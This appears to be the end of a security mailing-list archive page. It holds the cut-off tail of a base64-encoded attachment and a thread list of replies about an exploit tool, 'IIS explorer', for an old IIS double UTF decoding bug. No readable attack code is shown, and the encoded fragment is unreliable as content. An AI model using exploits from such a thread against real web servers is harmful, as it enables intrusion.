XKJCBKHwVaMGhoj4Gi0NCDfoNLW3zwKEP9EDPAYEraXwNJV3i93Q16DnN8OyvDNzm/c5ve+I/ufe
Ecq4+Ti9O/69oeAfsDJVFqhcsQrYiq4wYMGclKqGhoaGeW9Tly5cztNUxYsWMrYqBBB0rSwlqkLc
nm3FXzWaDpXBXbTbVac3GpAs5M1pzcakKTy80G0xuMmspgzaVwbU9rkklGj0QsEwV1NKJLncuKzR
RVmodK033hW5qG0E7mhZKqmNxqkUnl2rjpXmlvZIjUOu6f4rkZJhu6JQ6B4SwlqUu4rmw6vmqnLZ
JvtRW6VuZleXdILOS0xmR8k/V4M7KaBUoMUWOyg4MnhCMkw5NAyFpB6JYS1cVuQyzOyqqfQ5lqXj
IROfSsY+DU7sewDHoQx5IhTE7jEsjEdraxBww8BhpDBoMCwx3AwtDG4MZpv+Fifogf3/u9vc2Kus
eb+S/Exq9A5+94fJ39vo+Wra8vL7eb79Pz1bfD9v16t7X9O75/Z2fj3/nX9dzx/HZ7ebxdXu2P97
gA==
------=_NextPart_000_000A_01C22900.51AF7FB0--
Current thread:
- IIS double UTF decoding bug (old) exploit: IIS explorer Berend-Jan Wever (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Erik Fichtner (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Matthew S. Hallacy (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)